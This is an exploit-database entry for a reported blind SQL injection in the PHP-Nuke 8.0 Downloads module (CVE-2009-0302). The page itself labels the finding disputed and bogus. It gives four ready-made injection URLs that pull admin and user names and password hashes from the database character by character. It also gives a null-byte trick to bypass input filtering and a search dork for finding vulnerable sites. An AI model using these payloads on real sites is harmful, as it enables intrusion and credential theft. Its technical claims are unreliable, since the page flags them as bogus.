PHP-Nuke 8.0 Downloads Blind Sql Injection

WARNING! Fake news / Disputed / BOGUS

PHP-Nuke 8.0 Downloads Blind Sql Injection

2009.01.24

Credit: r3d.w0rm

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2009-0302

CWE: CWE-89

Dork: inurl:modules.php?name=Downloads \"PHP-Nuke\"

CVSS Base Score: 4.6/10

Impact Subscore: 6.4/10

Exploitability Subscore: 3.9/10

Exploit range: Remote

Attack complexity: High

Authentication: Single time

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

 #####################################################################################
#### PHP-Nuke 8.0 Downloads Blind Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://ircrash.com #
#My Official WebSite : http://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Download : http://phpnuke.org #
# #
#Dork : inurl:modules.php?name=Downloads "PHP-Nuke" #
# #
#####################################################################################
# [Bug] #
# #
#Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
# #
#####################################################################################
# [Note] #
# #
#1. magic_quotes_gpc = Off #
#2. register_globals = On #
#3. For using bug you must login via a simple user. #
#4. After using bug go to this url : #
#http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker_at_devil.net&title=zz&url=zz&description=zz
#5. I use ascii codes and null byte in url for bypass nuke security function #
# please don't change ascii code and %00. #
# #
###################################### TNX GOD ######################################

References:

http://xforce.iss.net/xforce/xfdb/48186

http://www.securityfocus.com/bid/33410

http://www.securityfocus.com/archive/1/archive/1/500335/100/0/threaded

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHP-Nuke 8.0 Downloads Blind Sql Injection

Dork: inurl:modules.php?name=Downloads \"PHP-Nuke\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.